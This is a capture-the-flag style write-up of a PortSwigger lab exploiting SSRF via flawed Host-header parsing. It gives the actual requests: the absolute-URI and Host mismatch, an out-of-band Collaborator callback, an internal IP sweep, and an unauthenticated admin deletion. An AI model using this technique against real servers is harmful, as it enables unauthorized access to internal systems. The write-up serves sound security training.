| Field | Detail |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | HTTP Host Header Attacks / SSRF |
| Difficulty | Practitioner |
| Objective | Exploit flawed request parsing to reach an internal admin panel on 192.168.0.0/24 and delete the user carlos |
SSRF via Flawed Request Parsing¶
Baseline GET / with the legitimate Host returned 200 OK.
Swapping Host to an arbitrary domain returned 403 Forbidden — the server validates the host header this time, unlike the previous routing-based SSRF lab.
The "flawed request parsing" means moving the legitimate domain into the request line as an absolute URI while placing our target in Host:
GET 0a27007003c01041819acf0a00ec0093.web-security-academy.net HTTP/2
Host: teto.com
504 Gateway Timeout — the server timed out trying to connect to teto.com.
The parser reads the Host header for routing while the absolute-URI request line satisfies the domain validation check. The validator and the router are reading different parts of the request — that's the flaw. Confirming it makes real outbound connections with a Collaborator payload:
GET 0a27007003c01041819acf0a00ec0093.web-security-academy.net HTTP/2
Host: gm64sulysttrnmcrqpatrs47yy4psgg5.oastify.com
Collaborator received the request. I sent the request to Intruder and swept 192.168.0.1–255 with the position on the last octet, same setup as before with "Update Host header to match target" unchecked:
GET 0a27007003c01041819acf0a00ec0093.web-security-academy.net HTTP/2
Host: 192.168.0.§x§
192.168.0.80 returned 404 Not Found — different from everything else in the sweep. A 404 from an internal host means we reached it; it just didn't find anything at /. That's the signal, not a miss.
Requesting /admin with the full absolute URI including https:// — dropping the scheme reverted to 404 behavior, so the scheme matters for correct routing here:
GET https://0a27007003c01041819acf0a00ec0093.web-security-academy.net/admin HTTP/2
Host: 192.168.0.80
Admin panel loaded — no authentication wall. Extracting the CSRF token from the delete form and passing everything as query parameters:
GET https://0a27007003c01041819acf0a00ec0093.web-security-academy.net/admin/delete?csrf=7uuUgfe8KruprG2wZEi2G7iNbNStM9fw&username=carlos HTTP/2
Host: 192.168.0.80
and now the lab is solved